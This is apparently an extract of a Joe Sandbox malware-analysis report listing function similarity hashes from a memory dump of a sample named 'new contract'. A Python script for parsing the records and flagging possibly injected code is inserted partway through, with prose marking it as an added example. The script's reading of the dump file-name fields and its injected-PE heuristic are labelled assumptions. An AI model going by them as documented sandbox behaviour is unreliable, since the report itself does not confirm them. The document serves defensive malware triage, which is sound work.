Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f3b670c542dd9c16feb753a68fffcffc7656df14dee663e611ff66082b696dc5
• Instruction ID: eed63c97f479120a3b8808949c2461c1922cfb4ce5fcab775067d38fcfb91f5a
• Opcode Fuzzy Hash: f3b670c542dd9c16feb753a68fffcffc7656df14dee663e611ff66082b696dc5
• Instruction Fuzzy Hash: 73414A315087469FD312DF698C40A6BF6EAAF88B54F44092EF984D7260E730DE058B97
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
• Instruction ID: 0844a7421833c86ad8d050fce86df3b885f42fe530ab56a9ad8da3bb56859624
• Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
• Instruction Fuzzy Hash: A9415F31A01251DFDB11DEAD8C407BABB72EB50B5AF19C06AE945DB348D73B8D81CB90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b150b869fea92d453e767372cf638832c9dfd1a05b88e31cb7633b2b09becb2
• Instruction ID: 0729c1b29939c8e640f8ef217244bd7623c4eb5658521eb1ace73691983ba782
• Opcode Fuzzy Hash: 2b150b869fea92d453e767372cf638832c9dfd1a05b88e31cb7633b2b09becb2
• Instruction Fuzzy Hash: 0F416671A01A11EFD721CF18C840B26BBF5FF58314F608A6EE8498B352E771E9428F95
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction ID: 1068def3f057096b09278aee1d5b27fd1b2447a05ed7d3d2e1ddf821e431ff9b
• Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction Fuzzy Hash: 1B413875A00605EFDB64CF98C990AAABBF9FF18704F10496DE996D7250D330EA44CF90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 295daa34aacd39af1e2bef6d3e13baaafc1cbf2fb53953a91dc27deea1688aae
                                                                                                                                                                            • Instruction ID: 75b5cf8c37c3ec9a2e3c2d918f8561f1bcb17c05c80ab3a99d8c9da22cff3c71
                                                                                                                                                                            • Opcode Fuzzy Hash: 295daa34aacd39af1e2bef6d3e13baaafc1cbf2fb53953a91dc27deea1688aae
                                                                                                                                                                            • Instruction Fuzzy Hash: 4941AEB1505B21DFCB21EF28CD60B69B7B2FF54720F1086ADD8169B2A1DB70A941CF51
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0017a4b130fda84d7e8a68ae37694ed02993f58196ff6f3d90ab208ea9a0315b
                                                                                                                                                                            • Instruction ID: 44aa2dd131f4e88e03fb1c697b26cf297931704e3ea2d744d4d24723e323433f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0017a4b130fda84d7e8a68ae37694ed02993f58196ff6f3d90ab208ea9a0315b
                                                                                                                                                                            • Instruction Fuzzy Hash: A63188B1A01349DFDB52CF68C840B99BBF9EF49724F2085AED519EB251D3329902CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a7c9799d43313690d2b4a4cde230d6bd2abb5075d1f1132632d167288ccc58b9
                                                                                                                                                                            • Instruction ID: dac2e5b8d0e04bd0f82df28e8de953bedeac4abd5b65221bbbc7b58648668e3e
                                                                                                                                                                            • Opcode Fuzzy Hash: a7c9799d43313690d2b4a4cde230d6bd2abb5075d1f1132632d167288ccc58b9
                                                                                                                                                                            • Instruction Fuzzy Hash: B941AE729043019BD760DF28C845B9BBBE8FF88724F008A2EF998C7250D770D805CB96
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dc0f685c67238c431522b34a120768b230f8215306e50f8100db57e8846742fc
                                                                                                                                                                            • Instruction ID: 719e2d1566a1b65463b461793b843483c640a4aedac7fca62eb276a20985f1a9
                                                                                                                                                                            • Opcode Fuzzy Hash: dc0f685c67238c431522b34a120768b230f8215306e50f8100db57e8846742fc
                                                                                                                                                                            • Instruction Fuzzy Hash: EF41E372E05617AFDB01DF18CC81AA8B7BAFF54761F288629D815A7384D734ED418BD0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6156731f5860058f4477628e8d838e54d5542ed14ccff9719b3801dfa11fa744
                                                                                                                                                                            • Instruction ID: 4b9a3aa0d8b46dbe77809868935034c6363748da0286c4f0a89662d4e70862a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6156731f5860058f4477628e8d838e54d5542ed14ccff9719b3801dfa11fa744
                                                                                                                                                                            • Instruction Fuzzy Hash: A841B1726046529FC320DF68CC40A6AB7E9BFC8700F54461DF99597780E730ED14CBAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e4aefd5009d045e3c4c784acc8faa964ccb87d51744996b19423adae096c8516
                                                                                                                                                                            • Instruction ID: cf087c688850b717beaede68892443661fede14c47912aea0cdf78c39a99dfda
                                                                                                                                                                            • Opcode Fuzzy Hash: e4aefd5009d045e3c4c784acc8faa964ccb87d51744996b19423adae096c8516
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41BE30B047228BD725DF2CDC94B2ABBAAEF80360F14442DE6468B391DB70D951CF91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e7a44aace2a44bca98a2a5e1dc5137c95469a60b942c7c0ff87a3d6ea624ca26
                                                                                                                                                                            • Instruction ID: 2f18c1de59b34d8bf90bb1b262051ddf31d543d1c7dd4bc55c976985e4e801ac
                                                                                                                                                                            • Opcode Fuzzy Hash: e7a44aace2a44bca98a2a5e1dc5137c95469a60b942c7c0ff87a3d6ea624ca26
                                                                                                                                                                            • Instruction Fuzzy Hash: C0418071A01615CFCB15DF69CD8099DBBF6FF98320B28862ED466A7354DB349941CB40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                            • Instruction ID: 8caf8dc511a1e38541fa7dfd065d81431d807dce477a0d50be68b73db6989f1c
                                                                                                                                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                            • Instruction Fuzzy Hash: C2314631A04246AFEB129B6CCC80B9BBFF9AF54310F0441A9F855D7342C7B4D888CBA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e8afb8873556c7e702c830b0b4ba296b45627c5a6704078485a5a48a030be4a
                                                                                                                                                                            • Instruction ID: dd64349d0caed86904edce6c04eaa622ad0046229f04f569065d4b685e329979
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e8afb8873556c7e702c830b0b4ba296b45627c5a6704078485a5a48a030be4a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E31B431741716ABD722AF658C40FBFBAB9EB59F50F00402CF600AB381CAA5DC0187E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 86eaa421ac9e3e8799389e66366cb6703fd3670b8817a404f65a1010afcf578b
                                                                                                                                                                            • Instruction ID: 16aaa8faa1d1aea3cc58b81f874d7da63ff1d099cdfb1fa44080ec8194032444
                                                                                                                                                                            • Opcode Fuzzy Hash: 86eaa421ac9e3e8799389e66366cb6703fd3670b8817a404f65a1010afcf578b
                                                                                                                                                                            • Instruction Fuzzy Hash: B3319E32A052018FC721DF1DDC80E66B7E6FB85360F0A846EF9958BB51DB71AC41CB95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 564ebf085ce4ba27262bcbf9a5e1fd7397d9f0fa7d4369129baa45617b114ad7
• Instruction ID: 74750071f425ef9aecc4398bc2d66cdbaa3da26e72d57ebfc0b99691f60fe2be
• Opcode Fuzzy Hash: 564ebf085ce4ba27262bcbf9a5e1fd7397d9f0fa7d4369129baa45617b114ad7
• Instruction Fuzzy Hash: 5C418D31200B45DFD722DF29CC91BD67BE9BB45354F01892DE65A8B350CBB4E804CB94
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34dfc8b1f1515a3b65b106f17a28e2274bd7531152c2ab8e4d23ba6f7432ae71
• Instruction ID: 41eb58a2667daf629cfa0e023e6807732ca4fc2d31e0f50b8e3dc6046a3187cc
• Opcode Fuzzy Hash: 34dfc8b1f1515a3b65b106f17a28e2274bd7531152c2ab8e4d23ba6f7432ae71
• Instruction Fuzzy Hash: F6318B71A052019FD720DF2CCC90A2AB7E5FB84720F09896DF9959BB91EB30ED05CB95
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce064cf4eb2fadec36df5c6da094f999d009109d2c6173fd0e5eb263746c6f0e
• Instruction ID: 95dd422d1a47ba60c41d2b5b88f67f51accf841c31d19ddf12a0c531881f39f0
• Opcode Fuzzy Hash: ce064cf4eb2fadec36df5c6da094f999d009109d2c6173fd0e5eb263746c6f0e
• Instruction Fuzzy Hash: F031B0326016C2DBFB22D75CCE48B257BDDBB40B44F1D04A4AA859B7D2DB29D841C224
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dcfb0d3c110c2898f4a4f9bca96a708d0050e2556dd3eaaddb87d6c431a0901c
• Instruction ID: c927dc34d287a3c555bbf09f6b3fd80a28a5bbd268155951213f515984f8eef9
• Opcode Fuzzy Hash: dcfb0d3c110c2898f4a4f9bca96a708d0050e2556dd3eaaddb87d6c431a0901c
• Instruction Fuzzy Hash: 7931B275A01116AFDB15DF98CC44BAEB7FAEB48740F458268E900AB244D770ED01CBA4
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
• Instruction ID: d83bec19bca9aa13012b0bcd80bda2d15b7c7692c3947a70a9ac02d2a8c80319
• Opcode Fuzzy Hash: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
• Instruction Fuzzy Hash: 92315576A4012DABCB21DF54DC94BDE7BFAEB98750F1040A9E508A7250CB30DE51CF90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
• Instruction ID: c2bfe59dba533d21182ae14abbffcdabc98b9b293a333781376faeaef9a9b128
• Opcode Fuzzy Hash: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
• Instruction Fuzzy Hash: 0931E432E00215AFDB21DFA9CD40AAEBBF9FF44350F018569E516E7250D3759E008BA0
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
• Instruction ID: 1771533ac17e135ad0b2101b4777c00ac6907058b0725253bf676d99adc7484b
• Opcode Fuzzy Hash: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
• Instruction Fuzzy Hash: 0D31F471A41202EBDB139FADCC50BAABBFAAF94315F00416DE506EB342DB30DD018B90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
• Instruction ID: 025d8f037d074657ae46b306b25f0794ec87e2f898655cf1318c2294146f5397
• Opcode Fuzzy Hash: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
• Instruction Fuzzy Hash: E831F976A04B22DBCB12DE288C80D6BBBA6AFD4650F03456DFD5697310DB74DC018BD5
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
• Instruction ID: e1e3c87b75115056d321253340ccafa3bd20a708a3899729c2a5d1e8b2ca9c27
• Opcode Fuzzy Hash: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
• Instruction Fuzzy Hash: 3831AFB26097118FE761DF19CC40B2BBBE9FB88700F044A6DE984A7351D770E844CBA2
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction ID: 1400c53ce238a1056cab4ee0124ec31983b74f318bca9abbb178aacbac95d32b
• Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction Fuzzy Hash: 8C312CB6B00B01AFD761CFA9DE40B67BBF8AB08650F04052DA99AC3751E730E9008B64
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
• Instruction ID: 4842cbb18445357c1fa97985701e9418a8ada24d8f1bfdf01c1cc0fbc67819ac
• Opcode Fuzzy Hash: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
• Instruction Fuzzy Hash: F2318BB16093418FCB11DF1DC95086ABFF1FF89A18F4449AEE4989B351D332D945CB92
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
• Instruction ID: 4e05626720fd501fe8059d65100ab2abbdc88bdf5e68500c5d90fd9d3ebd3af6
• Opcode Fuzzy Hash: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
• Instruction Fuzzy Hash: 3C31D472B012059FD724EFA9CD82B6EBBFAEB84704F008529D545D7255DB30D946CB90
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
• Instruction ID: 02d137a258adfe2932184f44b648cfcfaea614ee8782c4890b7341cee038cf92
• Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
• Instruction Fuzzy Hash: 56210436E4125AAADB10DFB98C01BAFBBB6AF54750F098175AE15E7340E370CD0187A0
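Every record in this part of the listing comes from the same dump (the .sdmp at Offset 015F0000, marked "based on PE: true") and carries code hashes only: API ID, String ID and API String ID are empty, so any match against another sample has to rest on the Opcode and Instruction hashes. The following Python is an added example, not part of the report or of Joe Sandbox's own tooling: it parses records in this layout, flags rows that cannot be trusted for pivoting, decodes the dump region, and matches Instruction Fuzzy Hashes between two listings. The two embedded records are copied from this page; the reading of the .sdmp file-name fields as base address, protection, state and type, and the "injected PE" heuristic built on it, are assumptions labelled as such in the code.

```python
import re
from collections import Counter, defaultdict

# Added example, not part of the Joe Sandbox report or its IDA plugin. The two
# records below are copied verbatim from the similarity listing on this page;
# the leading whitespace is kept so the parser handles the extracted layout.
SAMPLE = """
        Memory Dump Source
        • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
        • Instruction ID: 1400c53ce238a1056cab4ee0124ec31983b74f318bca9abbb178aacbac95d32b
        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
        • Instruction Fuzzy Hash: 8C312CB6B00B01AFD761CFA9DE40B67BBF8AB08650F04052DA99AC3751E730E9008B64
        Memory Dump Source
        • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
        • Instruction ID: 02d137a258adfe2932184f44b648cfcfaea614ee8782c4890b7341cee038cf92
        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
        • Instruction Fuzzy Hash: 56210436E4125AAADB10DFB98C01BAFBBB6AF54750F098175AE15E7340E370CD0187A0
"""

FIELD_RE = re.compile(r"^\s*•\s*(.+?):\s*(.*?)\s*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
HASH_FIELDS = ("Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
# Windows VirtualQuery constants used to name the protection and type fields.
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

def parse_records(text):
    """One dict per function; a record starts at the 'Memory Dump Source' line."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = {}
            records.append(current)
        elif (m := FIELD_RE.match(line)) and current is not None:
            current[m.group(1)] = m.group(2)
    return records

def check_record(rec):
    """Findings to flag before using a record for cross-sample pivoting."""
    findings = [f"{k}: missing or non-hex" for k in HASH_FIELDS if not HEX_RE.match(rec.get(k, ""))]
    # Opcode ID and Opcode Fuzzy Hash carry the same value in the report; a
    # mismatch means a mangled row, not a real difference.
    if rec.get("Opcode ID") != rec.get("Opcode Fuzzy Hash"):
        findings.append("Opcode ID != Opcode Fuzzy Hash")
    # Empty API ID / String ID: no imports resolved and no strings referenced, so
    # any match with another sample rests on the code hashes alone.
    if not rec.get("API ID") and not rec.get("String ID"):
        findings.append("no API or string features; code-hash-only similarity")
    return findings

def describe_region(source_file):
    """Decode which dump the function came from. Assumption (not stated on this
    page): dot-separated fields 4..7 of the .sdmp name are base address,
    protection, state and type as VirtualQuery reports them; the base is
    cross-checked against the 'Offset:' value the page does state."""
    name, rest = source_file.split(",", 1)
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", rest)
    parts = name.strip().split(".")
    base, protect, mem_type = (int(parts[i], 16) for i in (3, 4, 6))
    if base != int(m.group(1), 16):
        raise ValueError(f"base {base:#x} does not match Offset {m.group(1)}")
    pe = m.group(2) == "true"
    return {
        "base": base,
        "protect": PROTECT.get(protect, f"{protect:#x}"),
        "type": MEM_TYPE.get(mem_type, f"{mem_type:#x}"),
        "based_on_pe": pe,
        # Heuristic (assumption): a PE image in private, unbacked RWX memory is
        # the usual footprint of an injected or hollowed payload, not a module.
        "injected_pe_candidate": pe and protect == 0x40 and mem_type == 0x20000,
    }

def pivot(records):
    """Index by Instruction Fuzzy Hash for matching; count functions per dump."""
    by_hash, by_region = defaultdict(list), Counter()
    for rec in records:
        by_hash[rec.get("Instruction Fuzzy Hash")].append(rec.get("Opcode ID"))
        by_region[rec.get("Source File", "").split(",")[0]] += 1
    return by_hash, by_region

def find_shared(records_a, records_b):
    """Opcode IDs in A whose Instruction Fuzzy Hash also occurs in B. Exact string
    match only: the page does not document the fuzzy hash algorithm."""
    hashes_b = {r.get("Instruction Fuzzy Hash") for r in records_b}
    return [r["Opcode ID"] for r in records_a if r.get("Instruction Fuzzy Hash") in hashes_b]
```

To compare two reports, run parse_records over each listing and pass the results to find_shared; feeding the second record back in as a stand-in for another sample returns its Opcode ID, while the first record alone matches nothing. Only exact string equality is used because the page gives no algorithm for the fuzzy hash, so treat a near-miss as unknown rather than as a non-match.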
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
• Instruction ID: 0a82c6eb385a871c417d51834242b035fe52aa7aeba680439fb735dc546217a2
• Opcode Fuzzy Hash: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 563170715002118BD731AF5CCC41B79B7B5EF80314F44C5ADD9459B386DB74D982CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                            • Instruction ID: a820a597d640a7f53d6cb0e4240e455a0ac22bc1bc21b112a596527a0edf2762
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A213D36A0065AB7CB15ABA98C00ABFBBBBEF40710F40801EFA9587691E734D940C764
                                                                                                                                                                            Memory Dump Source
